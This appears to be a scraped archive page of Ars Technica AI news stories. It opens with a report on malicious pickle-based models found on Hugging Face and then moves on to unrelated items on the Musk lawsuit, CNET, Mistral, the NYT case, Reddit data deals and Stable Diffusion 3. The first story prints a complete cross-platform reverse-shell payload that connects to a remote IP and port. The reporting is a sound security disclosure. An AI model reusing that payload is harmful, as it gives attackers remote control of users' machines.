AI

hugging-face,-the-github-of-ai,-hosted-code-that-backdoored-user-devices

Hugging Face, the GitHub of AI, hosted code that backdoored user devices

IN A PICKLE —

Malicious submissions have been a fact of life for code repositories. AI is no different.

Photograph depicts a security scanner extracting virus from a string of binary code. Hand with the word

Getty Images

Code uploaded to AI developer platform Hugging Face covertly installed backdoors and other types of malware on end-user machines, researchers from security firm JFrog said Thursday in a report that’s a likely harbinger of what’s to come.

In all, JFrog researchers said, they found roughly 100 submissions that performed hidden and unwanted actions when they were downloaded and loaded onto an end-user device. Most of the flagged machine learning models—all of which went undetected by Hugging Face—appeared to be benign proofs of concept uploaded by researchers or curious users. JFrog researchers said in an email that 10 of them were “truly malicious” in that they performed actions that actually compromised the users’ security when loaded.

Full control of user devices

One model drew particular concern because it opened a reverse shell that gave a remote device on the Internet full control of the end user’s device. When JFrog researchers loaded the model into a lab machine, the submission indeed loaded a reverse shell but took no further action.

That, the IP address of the remote device, and the existence of identical shells connecting elsewhere raised the possibility that the submission was also the work of researchers. An exploit that opens a device to such tampering, however, is a major breach of researcher ethics and demonstrates that, just like code submitted to GitHub and other developer platforms, models available on AI sites can pose serious risks if not carefully vetted first.

“The model’s payload grants the attacker a shell on the compromised machine, enabling them to gain full control over victims’ machines through what is commonly referred to as a ‘backdoor,’” JFrog Senior Researcher David Cohen wrote. “This silent infiltration could potentially grant access to critical internal systems and pave the way for large-scale data breaches or even corporate espionage, impacting not just individual users but potentially entire organizations across the globe, all while leaving victims utterly unaware of their compromised state.”

A lab machine set up as a honeypot to observe what happened when the model was loaded.

A lab machine set up as a honeypot to observe what happened when the model was loaded.

JFrog

Secrets and other bait data the honeypot used to attract the threat actor.

Enlarge / Secrets and other bait data the honeypot used to attract the threat actor.

JFrog

How baller432 did it

Like the other nine truly malicious models, the one discussed here used pickle, a format that has long been recognized as inherently risky. Pickles is commonly used in Python to convert objects and classes in human-readable code into a byte stream so that it can be saved to disk or shared over a network. This process, known as serialization, presents hackers with the opportunity of sneaking malicious code into the flow.

The model that spawned the reverse shell, submitted by a party with the username baller432, was able to evade Hugging Face’s malware scanner by using pickle’s “__reduce__” method to execute arbitrary code after loading the model file.

JFrog’s Cohen explained the process in much more technically detailed language:

In loading PyTorch models with transformers, a common approach involves utilizing the torch.load() function, which deserializes the model from a file. Particularly when dealing with PyTorch models trained with Hugging Face’s Transformers library, this method is often employed to load the model along with its architecture, weights, and any associated configurations. Transformers provide a comprehensive framework for natural language processing tasks, facilitating the creation and deployment of sophisticated models. In the context of the repository “baller423/goober2,” it appears that the malicious payload was injected into the PyTorch model file using the __reduce__ method of the pickle module. This method, as demonstrated in the provided reference, enables attackers to insert arbitrary Python code into the deserialization process, potentially leading to malicious behavior when the model is loaded.

Upon analysis of the PyTorch file using the fickling tool, we successfully extracted the following payload:

RHOST = "210.117.212.93"  RPORT = 4242    from sys import platform    if platform != 'win32':      import threading      import socket      import pty      import os        def connect_and_spawn_shell():          s = socket.socket()          s.connect((RHOST, RPORT))          [os.dup2(s.fileno(), fd) for fd in (0, 1, 2)]          pty.spawn("https://arstechnica.com/bin/sh")        threading.Thread(target=connect_and_spawn_shell).start()  else:      import os      import socket      import subprocess      import threading      import sys        def send_to_process(s, p):          while True:              p.stdin.write(s.recv(1024).decode())              p.stdin.flush()        def receive_from_process(s, p):          while True:              s.send(p.stdout.read(1).encode())        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)        while True:          try:              s.connect((RHOST, RPORT))              break          except:              pass        p = subprocess.Popen(["powershell.exe"],                            stdout=subprocess.PIPE,                           stderr=subprocess.STDOUT,                           stdin=subprocess.PIPE,                           shell=True,                           text=True)        threading.Thread(target=send_to_process, args=[s, p], daemon=True).start()      threading.Thread(target=receive_from_process, args=[s, p], daemon=True).start()      p.wait()

Hugging Face has since removed the model and the others flagged by JFrog.

Hugging Face, the GitHub of AI, hosted code that backdoored user devices Read More »

elon-musk-sues-openai-and-sam-altman,-accusing-them-of-chasing-profits

Elon Musk sues OpenAI and Sam Altman, accusing them of chasing profits

YA Musk lawsuit —

OpenAI is now a “closed-source de facto subsidiary” of Microsoft, says lawsuit.

Elon Musk sues OpenAI and Sam Altman, accusing them of chasing profits

Elon Musk has sued OpenAI and its chief executive Sam Altman for breach of contract, alleging they have compromised the start-up’s original mission of building artificial intelligence systems for the benefit of humanity.

In the lawsuit, filed to a San Francisco court on Thursday, Musk’s lawyers wrote that OpenAI’s multibillion-dollar alliance with Microsoft had broken an agreement to make a major breakthrough in AI “freely available to the public.”

Instead, the lawsuit said, OpenAI was working on “proprietary technology to maximise profits for literally the largest company in the world.”

The legal fight escalates a long-running dispute between Musk, who has founded his own AI company, known as xAI, and OpenAI, which has received a $13 billion investment from Microsoft.

Musk, who helped co-found OpenAI in 2015, said in his legal filing he had donated $44 million to the group, and had been “induced” to make contributions by promises, “including in writing,” that it would remain a non-profit organisation.

He left OpenAI’s board in 2018 following disagreements with Altman on the direction of research. A year later, the group established the for-profit arm that Microsoft has invested into.

Microsoft’s president Brad Smith told the Financial Times this week that while the companies were “very important partners,” “Microsoft does not control OpenAI.”

Musk’s lawsuit alleges that OpenAI’s latest AI model, GPT4, released in March last year, breached the threshold for artificial general intelligence (AGI), at which computers function at or above the level of human intelligence.

The Microsoft deal only gives the tech giant a licence to OpenAI’s pre-AGI technology, the lawsuit said, and determining when this threshold is reached is key to Musk’s case.

The lawsuit seeks a court judgment over whether GPT4 should already be considered to be AGI, arguing that OpenAI’s board was “ill-equipped” to make such a determination.

The filing adds that OpenAI is also building another model, Q*, that will be even more powerful and capable than GPT4. It argues that OpenAI is committed under the terms of its founding agreement to make such technology available publicly.

“Mr. Musk has long recognised that AGI poses a grave threat to humanity—perhaps the greatest existential threat we face today,” the lawsuit says.

“To this day, OpenAI, Inc.’s website continues to profess that its charter is to ensure that AGI ‘benefits all of humanity’,” it adds. “In reality, however, OpenAI, Inc. has been transformed into a closed-source de facto subsidiary of the largest technology company in the world: Microsoft.”

OpenAI maintains it has not yet achieved AGI, despite its models’ success in language and reasoning tasks. Large language models like GPT4 still generate errors, fabrications and so-called hallucinations.

The lawsuit also seeks to “compel” OpenAI to adhere to its founding agreement to build technology that does not simply benefit individuals such as Altman and corporations such as Microsoft.

Musk’s own xAI company is a direct competitor to OpenAI and launched its first product, a chatbot named Grok, in December.

OpenAI declined to comment. Representatives for Musk have been approached for comment. Microsoft did not immediately respond to a request for comment.

The Microsoft-OpenAI alliance is being reviewed by competition watchdogs in the US, EU and UK.

The US Securities and Exchange Commission issued subpoenas to OpenAI executives in November as part of an investigation into whether Altman had misled its investors, according to people familiar with the move.

That investigation came shortly after OpenAI’s board fired Altman as chief executive only to reinstate him days later. A new board has since been instituted including former Salesforce co-chief executive Bret Taylor as chair.

There is an ongoing internal review of the former board’s allegations against Altman by independent law firm WilmerHale.

© 2024 The Financial Times Ltd. All rights reserved Not to be redistributed, copied, or modified in any way.

Elon Musk sues OpenAI and Sam Altman, accusing them of chasing profits Read More »

ai-generated-articles-prompt-wikipedia-to-downgrade-cnet’s-reliability-rating

AI-generated articles prompt Wikipedia to downgrade CNET’s reliability rating

The hidden costs of AI —

Futurism report highlights the reputational cost of publishing AI-generated content.

The CNET logo on a smartphone screen.

Wikipedia has downgraded tech website CNET’s reliability rating following extensive discussions among its editors regarding the impact of AI-generated content on the site’s trustworthiness, as noted in a detailed report from Futurism. The decision reflects concerns over the reliability of articles found on the tech news outlet after it began publishing AI-generated stories in 2022.

Around November 2022, CNET began publishing articles written by an AI model under the byline “CNET Money Staff.” In January 2023, Futurism brought widespread attention to the issue and discovered that the articles were full of plagiarism and mistakes. (Around that time, we covered plans to do similar automated publishing at BuzzFeed.) After the revelation, CNET management paused the experiment, but the reputational damage had already been done.

Wikipedia maintains a page called “Reliable sources/Perennial sources” that includes a chart featuring news publications and their reliability ratings as viewed from Wikipedia’s perspective. Shortly after the CNET news broke in January 2023, Wikipedia editors began a discussion thread on the Reliable Sources project page about the publication.

“CNET, usually regarded as an ordinary tech RS [reliable source], has started experimentally running AI-generated articles, which are riddled with errors,” wrote a Wikipedia editor named David Gerard. “So far the experiment is not going down well, as it shouldn’t. I haven’t found any yet, but any of these articles that make it into a Wikipedia article need to be removed.”

After other editors agreed in the discussion, they began the process of downgrading CNET’s reliability rating.

As of this writing, Wikipedia’s Perennial Sources list currently features three entries for CNET broken into three time periods: (1) before October 2020, when Wikipedia considered CNET a “generally reliable” source; (2) between October 2020 and October 2022, where Wikipedia notes that the site was acquired by Red Ventures in October 2020, “leading to a deterioration in editorial standards” and saying there is no consensus about reliability; and (3) between November 2022 and present, where Wikipedia currently considers CNET “generally unreliable” after the site began using an AI tool “to rapidly generate articles riddled with factual inaccuracies and affiliate links.”

A screenshot of a chart featuring CNET's reliability ratings, as found on Wikipedia's

Enlarge / A screenshot of a chart featuring CNET’s reliability ratings, as found on Wikipedia’s “Perennial Sources” page.

Futurism reports that the issue with CNET’s AI-generated content also sparked a broader debate within the Wikipedia community about the reliability of sources owned by Red Ventures, such as Bankrate and CreditCards.com. Those sites published AI-generated content around the same period of time as CNET. The editors also criticized Red Ventures for not being forthcoming about where and how AI was being implemented, further eroding trust in the company’s publications. This lack of transparency was a key factor in the decision to downgrade CNET’s reliability rating.

In response to the downgrade and the controversies surrounding AI-generated content, CNET issued a statement that claims that the site maintains high editorial standards.

“CNET is the world’s largest provider of unbiased tech-focused news and advice,” a CNET spokesperson said in a statement to Futurism. “We have been trusted for nearly 30 years because of our rigorous editorial and product review standards. It is important to clarify that CNET is not actively using AI to create new content. While we have no specific plans to restart, any future initiatives would follow our public AI policy.”

This article was updated on March 1, 2024 at 9: 30am to reflect fixes in the date ranges for CNET on the Perennial Sources page.

AI-generated articles prompt Wikipedia to downgrade CNET’s reliability rating Read More »

microsoft-partners-with-openai-rival-mistral-for-ai-models,-drawing-eu-scrutiny

Microsoft partners with OpenAI-rival Mistral for AI models, drawing EU scrutiny

The European Approach —

15M euro investment comes as Microsoft hosts Mistral’s GPT-4 alternatives on Azure.

Velib bicycles are parked in front of the the U.S. computer and micro-computing company headquarters Microsoft on January 25, 2023 in Issy-les-Moulineaux, France.

On Monday, Microsoft announced plans to offer AI models from Mistral through its Azure cloud computing platform, which came in conjunction with a 15 million euro non-equity investment in the French firm, which is often seen as a European rival to OpenAI. Since then, the investment deal has faced scrutiny from European Union regulators.

Microsoft’s deal with Mistral, known for its large language models akin to OpenAI’s GPT-4 (which powers the subscription versions of ChatGPT), marks a notable expansion of its AI portfolio at a time when its well-known investment in California-based OpenAI has raised regulatory eyebrows. The new deal with Mistral drew particular attention from regulators because Microsoft’s investment could convert into equity (partial ownership of Mistral as a company) during Mistral’s next funding round.

The development has intensified ongoing investigations into Microsoft’s practices, particularly related to the tech giant’s dominance in the cloud computing sector. According to Reuters, EU lawmakers have voiced concerns that Mistral’s recent lobbying for looser AI regulations might have been influenced by its relationship with Microsoft. These apprehensions are compounded by the French government’s denial of prior knowledge of the deal, despite earlier lobbying for more lenient AI laws in Europe. The situation underscores the complex interplay between national interests, corporate influence, and regulatory oversight in the rapidly evolving AI landscape.

Avoiding American influence

The EU’s reaction to the Microsoft-Mistral deal reflects broader tensions over the role of Big Tech companies in shaping the future of AI and their potential to stifle competition. Calls for a thorough investigation into Microsoft and Mistral’s partnership have been echoed across the continent, according to Reuters, with some lawmakers accusing the firms of attempting to undermine European legislative efforts aimed at ensuring a fair and competitive digital market.

The controversy also touches on the broader debate about “European champions” in the tech industry. France, along with Germany and Italy, had advocated for regulatory exemptions to protect European startups. However, the Microsoft-Mistral deal has led some, like MEP Kim van Sparrentak, to question the motives behind these exemptions, suggesting they might have inadvertently favored American Big Tech interests.

“That story seems to have been a front for American-influenced Big Tech lobby,” said Sparrentak, as quoted by Reuters. Sparrentak has been a key architect of the EU’s AI Act, which has not yet been passed. “The Act almost collapsed under the guise of no rules for ‘European champions,’ and now look. European regulators have been played.”

MEP Alexandra Geese also expressed concerns over the concentration of money and power resulting from such partnerships, calling for an investigation. Max von Thun, Europe director at the Open Markets Institute, emphasized the urgency of investigating the partnership, criticizing Mistral’s reported attempts to influence the AI Act.

Also on Monday, amid the partnership news, Mistral announced Mistral Large, a new large language model (LLM) that Mistral says “ranks directly after GPT-4 based on standard benchmarks.” Mistral has previously released several open-weights AI models that have made news for their capabilities, but Mistral Large will be a closed model only available to customers through an API.

Microsoft partners with OpenAI-rival Mistral for AI models, drawing EU scrutiny Read More »

openai-accuses-nyt-of-hacking-chatgpt-to-set-up-copyright-suit

OpenAI accuses NYT of hacking ChatGPT to set up copyright suit

OpenAI accuses NYT of hacking ChatGPT to set up copyright suit

OpenAI is now boldly claiming that The New York Times “paid someone to hack OpenAI’s products” like ChatGPT to “set up” a lawsuit against the leading AI maker.

In a court filing Monday, OpenAI alleged that “100 examples in which some version of OpenAI’s GPT-4 model supposedly generated several paragraphs of Times content as outputs in response to user prompts” do not reflect how normal people use ChatGPT.

Instead, it allegedly took The Times “tens of thousands of attempts to generate” these supposedly “highly anomalous results” by “targeting and exploiting a bug” that OpenAI claims it is now “committed to addressing.”

According to OpenAI this activity amounts to “contrived attacks” by a “hired gun”—who allegedly hacked OpenAI models until they hallucinated fake NYT content or regurgitated training data to replicate NYT articles. NYT allegedly paid for these “attacks” to gather evidence to support The Times’ claims that OpenAI’s products imperil its journalism by allegedly regurgitating reporting and stealing The Times’ audiences.

“Contrary to the allegations in the complaint, however, ChatGPT is not in any way a substitute for a subscription to The New York Times,” OpenAI argued in a motion that seeks to dismiss the majority of The Times’ claims. “In the real world, people do not use ChatGPT or any other OpenAI product for that purpose. Nor could they. In the ordinary course, one cannot use ChatGPT to serve up Times articles at will.”

In the filing, OpenAI described The Times as enthusiastically reporting on its chatbot developments for years without raising any concerns about copyright infringement. OpenAI claimed that it disclosed that The Times’ articles were used to train its AI models in 2020, but The Times only cared after ChatGPT’s popularity exploded after its debut in 2022.

According to OpenAI, “It was only after this rapid adoption, along with reports of the value unlocked by these new technologies, that the Times claimed that OpenAI had ‘infringed its copyright[s]’ and reached out to demand ‘commercial terms.’ After months of discussions, the Times filed suit two days after Christmas, demanding ‘billions of dollars.'”

Ian Crosby, Susman Godfrey partner and lead counsel for The New York Times, told Ars that “what OpenAI bizarrely mischaracterizes as ‘hacking’ is simply using OpenAI’s products to look for evidence that they stole and reproduced The Times’s copyrighted works. And that is exactly what we found. In fact, the scale of OpenAI’s copying is much larger than the 100-plus examples set forth in the complaint.”

Crosby told Ars that OpenAI’s filing notably “doesn’t dispute—nor can they—that they copied millions of The Times’ works to build and power its commercial products without our permission.”

“Building new products is no excuse for violating copyright law, and that’s exactly what OpenAI has done on an unprecedented scale,” Crosby said.

OpenAI argued that the court should dismiss claims alleging direct copyright, contributory infringement, Digital Millennium Copyright Act violations, and misappropriation, all of which it describes as “legally infirm.” Some fail because they are time-barred—seeking damages on training data for OpenAI’s older models—OpenAI claimed. Others allegedly fail because they misunderstand fair use or are preempted by federal laws.

If OpenAI’s motion is granted, the case would be substantially narrowed.

But if the motion is not granted and The Times ultimately wins—and it might—OpenAI may be forced to wipe ChatGPT and start over.

“OpenAI, which has been secretive and has deliberately concealed how its products operate, is now asserting it’s too late to bring a claim for infringement or hold them accountable. We disagree,” Crosby told Ars. “It’s noteworthy that OpenAI doesn’t dispute that it copied Times works without permission within the statute of limitations to train its more recent and current models.”

OpenAI did not immediately respond to Ars’ request to comment.

OpenAI accuses NYT of hacking ChatGPT to set up copyright suit Read More »

wendy’s-will-experiment-with-dynamic-surge-pricing-for-food-in-2025

Wendy’s will experiment with dynamic surge pricing for food in 2025

Sir, this is Wendy’s new AI-powered menu —

Surge pricing test next year means your cheeseburger may get more expensive at 6 pm.

A view of a Wendy's store on August 9, 2023 in Nanuet, New York.

Enlarge / A view of a Wendy’s store on August 9, 2023, in Nanuet, New York.

American fast food chain Wendy’s is planning to test dynamic pricing and AI menu features in 2025, reports Nation’s Restaurant News and Food & Wine. This means that prices for food items will automatically change throughout the day depending on demand, similar to “surge pricing” in rideshare apps like Uber and Lyft. The initiative was disclosed by Kirk Tanner, the CEO and president of Wendy’s, in a recent discussion with analysts.

According to Tanner, Wendy’s plans to invest approximately $20 million to install digital menu boards capable of displaying these real-time variable prices across all of its company-operated locations in the United States. An additional $10 million is earmarked over two years to enhance Wendy’s global system, which aims to improve order accuracy and upsell other menu items.

In conversation with Food & Wine, a spokesperson for Wendy’s confirmed the company’s commitment to this pricing strategy, describing it as part of a broader effort to grow its digital business. “Beginning as early as 2025, we will begin testing a variety of enhanced features on these digital menuboards like dynamic pricing, different offerings in certain parts of the day, AI-enabled menu changes and suggestive selling based on factors such as weather,” they said. “Dynamic pricing can allow Wendy’s to be competitive and flexible with pricing, motivate customers to visit and provide them with the food they love at a great value. We will test a number of features that we think will provide an enhanced customer and crew experience.”

A Wendy's drive-through menu as seen in 2023 during the FreshAI rollout.

Enlarge / A Wendy’s drive-through menu as seen in 2023 during the FreshAI rollout.

Wendy’s is not the first business to explore dynamic pricing—it’s a common practice in several industries, including hospitality, retail, airline travel, and the aforementioned rideshare apps. Its application in the fast-food sector is largely untested, and it’s uncertain how customers will react. However, a few other restaurants have tested the method and have experienced favorable results. “For us, it was all about consumer reaction,” Faizan Khan, a Dog Haus franchise owner, told Food & Wine. “The concern was if you’re going to raise prices, you’re going to sell less product, and it turns out that really wasn’t the case.”

The price-change plans are the latest in a series of moves designed to modernize Wendy’s business using technology—and increase profits. In 2023, Wendy’s began testing FreshAI, a system designed to take orders with a conversational AI bot, potentially replacing human workers in the process. In his discussion, Tanner also discussed “AI-enabled menu changes” and “suggestive selling” without elaboration, though the Wendy’s spokesperson remarked that suggestive selling may automatically emphasize some items based dynamically on local weather conditions, such as trying to sell cold drinks on a hot day.

If Wendy’s goes through with its plan, it’s unclear how the dynamic pricing will affect food delivery apps such as Uber Eats or Doordash, or even the Wendy’s mobile app. Presumably, third-party apps will need a way to link into Wendy’s dynamic price system (Wendy’s API anyone?).

In other news, Wendy’s is also testing “Saucy Nuggets” in a small number of restaurants near the chain’s Ohio headquarters. Refreshingly, they have nothing to do with AI.

Wendy’s will experiment with dynamic surge pricing for food in 2025 Read More »

after-a-decade-of-stops-and-starts,-apple-kills-its-electric-car-project

After a decade of stops and starts, Apple kills its electric car project

Project Titan —

Report claims Apple leadership worried profit margins simply wouldn’t be there.

An enormous ring-shaped building on a green campus.

Enlarge / Apple’s global headquarters in Cupertino, California.

After 10 years of development, multiple changes in direction and leadership, and a plethora of leaks, Apple has reportedly ended work on its electric car project. According to a report in Bloomberg, the company is shifting some of the staff to work on generative AI projects within the company and planning layoffs for some others.

Internally dubbed Project Titan, the long-in-development car would have ideally had a luxurious, limo-like interior, robust self-driving capabilities, and at least a $100,000 price tag. However, the ambition of the project was drawn down with time. For example, it was once planned to have Level 4 self-driving capabilities, but that was scaled back to Level 2+.

Delays had pushed the car (on which work initially began way back in 2014) to a target release date of 2028. Now it won’t be released at all.

The decision was “finalized by Apple’s most senior executives in recent weeks,” according to Bloomberg’s sources. Apple’s leadership worried that the car might never find the profit margins they previously hoped for. This development won’t surprise many who have been following closely, though. The project has been known to be troubled for a while, and Apple would have had to face high startup costs and a difficult regulatory environment even had it been able to get a product together.

The shift in focus was announced to staff by Apple executives Jeff Williams and Kevin Lynch. Many employees who were working on the self-driving feature of the car will be moved under AI chief John Giannandrea to work on various projects, including generative AI. However, the fates of others who worked on other aspects of the car, like automobile engineering and design, are less certain. The report says layoffs are likely but doesn’t specify how many or on what timeline.

For a long time, it was known that Apple was investing in two major expansions: one into the automobile space and one into augmented reality. The first step in the latter was rolled out in the form of the Vision Pro headset a few weeks ago. With the car project canceled, Apple’s known areas of planned future expansion include mixed reality, wearables, and generative AI.

After a decade of stops and starts, Apple kills its electric car project Read More »

reddit-cashes-in-on-ai-gold-rush-with-$203m-in-llm-training-license-fees

Reddit cashes in on AI gold rush with $203M in LLM training license fees

Your posts are the product —

Two- to three-year deals with Google, others, come amid legal uncertainty over “fair use.”

Enlarge / “Reddit Gold” takes on a whole new meaning when AI training data is involved.

The last week saw word leak that Google had agreed to license Reddit’s massive corpus of billions of posts and comments to help train its large language models. Now, in a recent Securities and Exchange Commission filing, the popular online forum has revealed that it will bring in $203 million from that and other unspecified AI data licensing contracts over the next three years.

Reddit’s Form S-1—published by the SEC late Thursday ahead of the site’s planned stock IPO—says the company expects $66.4 million of that data-derived value from LLM companies to come during the 2024 calendar year. Bloomberg previously reported the Google deal to be worth an estimated $60 million a year, suggesting that the three-year deal represents the vast majority of its AI licensing revenue so far.

Google and other AI companies that license Reddit’s data will receive “continuous access to [Reddit’s] data API as well as quarterly transfers of Reddit data over the term of the arrangement,” according to the filing. That constant, real-time access is particularly valuable, the site writes in the filing, because “Reddit data constantly grows and regenerates as users come and interact with their communities and each other.”

“Why pay for the cow…?”

While Reddit sees data licensing to AI firms as an important part of its financial future, its filing also notes that free use of its data has already been “a foundational part of how many of the leading large language models have been trained.” The filing seems almost bitter in noting that “some companies have constructed very large commercial language models using Reddit data without entering into a license agreement with us.”

That acknowledgment highlights the still-murky legal landscape over AI companies’ penchant for scraping huge swathes of the public web for training purposes, a practice those companies defend as fair use. And Reddit seems well aware that AI models may continue to hoover up its posts and comments for free, even as it tries to sell that data to others.

“Some companies may decline to license Reddit data and use such data without license given its open nature, even if in violation of the legal terms governing our services,” the company writes. “While we plan to vigorously enforce against such entities, such enforcement activities could take years to resolve, result in substantial expense, and divert management’s attention and other resources, and we may not ultimately be successful.”

Yet the mere existence of AI data licensing agreements like Reddit’s may influence how legal battles over this kind of data scraping play out. As Ars’ Timothy Lee and James Grimmelmann noted in a recent legal analysis, the establishment of a settled licensing market can have a huge impact on whether courts consider a novel use of digitized data to be “fair use” under copyright law.

“The more [AI data licensing] deals like this are signed in the coming months, the easier it will be for the plaintiffs to argue that the ‘effect on the market’ prong of fair use analysis should take this licensing market into account,” Lee and Grimmelmann wrote.

And while Reddit sees LLMs as a new revenue opportunity, the site also sees their popularity as a potential threat. The S-1 filing notes that “some users are also turning to LLMs such as ChatGPT, Gemini, and Anthropic” for seeking information, putting them in the same category of Reddit competition as “Google, Amazon, YouTube, Wikipedia, X, and other news sites.”

After filing for its IPO in late 2021, reports suggest Reddit is aiming to hit the stock market next month officially. The company will offer users and moderators with sufficient karma and/or activity on the site the opportunity to participate in that IPO through a directed share program.

Advance Publications, which owns Ars Technica parent Condé Nast, is the largest shareholder of Reddit.

Reddit cashes in on AI gold rush with $203M in LLM training license fees Read More »

tyler-perry-puts-$800-million-studio-expansion-on-hold-because-of-openai’s-sora

Tyler Perry puts $800 million studio expansion on hold because of OpenAI’s Sora

The Synthetic Screen —

Perry: Mind-blowing AI video-generation tools “will touch every corner of our industry.”

Tyler Perry in 2022.

Enlarge / Tyler Perry in 2022.

In an interview with The Hollywood Reporter published Thursday, filmmaker Tyler Perry spoke about his concerns related to the impact of AI video synthesis on entertainment industry jobs. In particular, he revealed that he has suspended a planned $800 million expansion of his production studio after seeing what OpenAI’s recently announced AI video generator Sora can do.

“I have been watching AI very closely,” Perry said in the interview. “I was in the middle of, and have been planning for the last four years… an $800 million expansion at the studio, which would’ve increased the backlot a tremendous size—we were adding 12 more soundstages. All of that is currently and indefinitely on hold because of Sora and what I’m seeing. I had gotten word over the last year or so that this was coming, but I had no idea until I saw recently the demonstrations of what it’s able to do. It’s shocking to me.”

OpenAI, the company behind ChatGPT, revealed a preview of Sora’s capabilities last week. Sora is a text-to-video synthesis model, and it uses a neural network—previously trained on video examples—that can take written descriptions of a scene and turn them into high-definition video clips up to 60 seconds long. Sora caused shock in the tech world because it appeared to surpass other AI video generators in capability dramatically. It seems that a similar shock also rippled into adjacent professional fields. “Being told that it can do all of these things is one thing, but actually seeing the capabilities, it was mind-blowing,” Perry said in the interview.

Tyler Perry Studios, which the actor and producer acquired in 2015, is a 330-acre lot located in Atlanta and is one of the largest film production facilities in the United States. Perry, who is perhaps best known for his series of Madea films, says that technology like Sora worries him because it could make the need for building sets or traveling to locations obsolete. He cites examples of virtual shooting in the snow of Colorado or on the Moon just by using a text prompt. “This AI can generate it like nothing.” The technology may represent a radical reduction in costs necessary to create a film, and that will likely put entertainment industry jobs in jeopardy.

“It makes me worry so much about all of the people in the business,” he told The Hollywood Reporter. “Because as I was looking at it, I immediately started thinking of everyone in the industry who would be affected by this, including actors and grip and electric and transportation and sound and editors, and looking at this, I’m thinking this will touch every corner of our industry.”

You can read the full interview at The Hollywood Reporter, which did an excellent job of covering Perry’s thoughts on a technology that may end up fundamentally disrupting Hollywood. To his mind, AI tech poses an existential risk to the entertainment industry that it can’t ignore: “There’s got to be some sort of regulations in order to protect us. If not, I just don’t see how we survive.”

Perry also looks beyond Hollywood and says that it’s not just filmmaking that needs to be on alert, and he calls for government action to help retain human employment in the age of AI. “If you look at it across the world, how it’s changing so quickly, I’m hoping that there’s a whole government approach to help everyone be able to sustain.”

Tyler Perry puts $800 million studio expansion on hold because of OpenAI’s Sora Read More »

stability-announces-stable-diffusion-3,-a-next-gen-ai-image-generator

Stability announces Stable Diffusion 3, a next-gen AI image generator

Pics and it didn’t happen —

SD3 may bring DALL-E-like prompt fidelity to an open-weights image-synthesis model.

Stable Diffusion 3 generation with the prompt: studio photograph closeup of a chameleon over a black background.

Enlarge / Stable Diffusion 3 generation with the prompt: studio photograph closeup of a chameleon over a black background.

On Thursday, Stability AI announced Stable Diffusion 3, an open-weights next-generation image-synthesis model. It follows its predecessors by reportedly generating detailed, multi-subject images with improved quality and accuracy in text generation. The brief announcement was not accompanied by a public demo, but Stability is opening up a waitlist today for those who would like to try it.

Stability says that its Stable Diffusion 3 family of models (which takes text descriptions called “prompts” and turns them into matching images) range in size from 800 million to 8 billion parameters. The size range accommodates allowing different versions of the model to run locally on a variety of devices—from smartphones to servers. Parameter size roughly corresponds to model capability in terms of how much detail it can generate. Larger models also require more VRAM on GPU accelerators to run.

Since 2022, we’ve seen Stability launch a progression of AI image-generation models: Stable Diffusion 1.4, 1.5, 2.0, 2.1, XL, XL Turbo, and now 3. Stability has made a name for itself as providing a more open alternative to proprietary image-synthesis models like OpenAI’s DALL-E 3, though not without controversy due to the use of copyrighted training data, bias, and the potential for abuse. (This has led to lawsuits that are unresolved.) Stable Diffusion models have been open-weights and source-available, which means the models can be run locally and fine-tuned to change their outputs.

  • Stable Diffusion 3 generation with the prompt: Epic anime artwork of a wizard atop a mountain at night casting a cosmic spell into the dark sky that says “Stable Diffusion 3” made out of colorful energy.

  • An AI-generated image of a grandma wearing a “Go big or go home sweatshirt” generated by Stable Diffusion 3.

  • Stable Diffusion 3 generation with the prompt: Three transparent glass bottles on a wooden table. The one on the left has red liquid and the number 1. The one in the middle has blue liquid and the number 2. The one on the right has green liquid and the number 3.

  • An AI-generated image created by Stable Diffusion 3.

  • Stable Diffusion 3 generation with the prompt: A horse balancing on top of a colorful ball in a field with green grass and a mountain in the background.

  • Stable Diffusion 3 generation with the prompt: Moody still life of assorted pumpkins.

  • Stable Diffusion 3 generation with the prompt: a painting of an astronaut riding a pig wearing a tutu holding a pink umbrella, on the ground next to the pig is a robin bird wearing a top hat, in the corner are the words “stable diffusion.”

  • Stable Diffusion 3 generation with the prompt: Resting on the kitchen table is an embroidered cloth with the text ‘good night’ and an embroidered baby tiger. Next to the cloth there is a lit candle. The lighting is dim and dramatic.

  • Stable Diffusion 3 generation with the prompt: Photo of an 90’s desktop computer on a work desk, on the computer screen it says “welcome”. On the wall in the background we see beautiful graffiti with the text “SD3” very large on the wall.

As far as tech improvements are concerned, Stability CEO Emad Mostaque wrote on X, “This uses a new type of diffusion transformer (similar to Sora) combined with flow matching and other improvements. This takes advantage of transformer improvements & can not only scale further but accept multimodal inputs.”

Like Mostaque said, the Stable Diffusion 3 family uses diffusion transformer architecture, which is a new way of creating images with AI that swaps out the usual image-building blocks (such as U-Net architecture) for a system that works on small pieces of the picture. The method was inspired by transformers, which are good at handling patterns and sequences. This approach not only scales up efficiently but also reportedly produces higher-quality images.

Stable Diffusion 3 also utilizes “flow matching,” which is a technique for creating AI models that can generate images by learning how to transition from random noise to a structured image smoothly. It does this without needing to simulate every step of the process, instead focusing on the overall direction or flow that the image creation should follow.

A comparison of outputs between OpenAI's DALL-E 3 and Stable Diffusion 3 with the prompt,

Enlarge / A comparison of outputs between OpenAI’s DALL-E 3 and Stable Diffusion 3 with the prompt, “Night photo of a sports car with the text “SD3″ on the side, the car is on a race track at high speed, a huge road sign with the text ‘faster.'”

We do not have access to Stable Diffusion 3 (SD3), but from samples we found posted on Stability’s website and associated social media accounts, the generations appear roughly comparable to other state-of-the-art image-synthesis models at the moment, including the aforementioned DALL-E 3, Adobe Firefly, Imagine with Meta AI, Midjourney, and Google Imagen.

SD3 appears to handle text generation very well in the examples provided by others, which are potentially cherry-picked. Text generation was a particular weakness of earlier image-synthesis models, so an improvement to that capability in a free model is a big deal. Also, prompt fidelity (how closely it follows descriptions in prompts) seems to be similar to DALL-E 3, but we haven’t tested that ourselves yet.

While Stable Diffusion 3 isn’t widely available, Stability says that once testing is complete, its weights will be free to download and run locally. “This preview phase, as with previous models,” Stability writes, “is crucial for gathering insights to improve its performance and safety ahead of an open release.”

Stability has been experimenting with a variety of image-synthesis architectures recently. Aside from SDXL and SDXL Turbo, just last week, the company announced Stable Cascade, which uses a three-stage process for text-to-image synthesis.

Listing image by Emad Mostaque (Stability AI)

Stability announces Stable Diffusion 3, a next-gen AI image generator Read More »

google-launches-“gemini-business”-ai,-adds-$20-to-the-$6-workspace-bill

Google launches “Gemini Business” AI, adds $20 to the $6 Workspace bill

$6 for apps like Gmail and Docs, and $20 for an AI bot? —

Google’s AI features add a 3x increase over the usual Workspace bill.

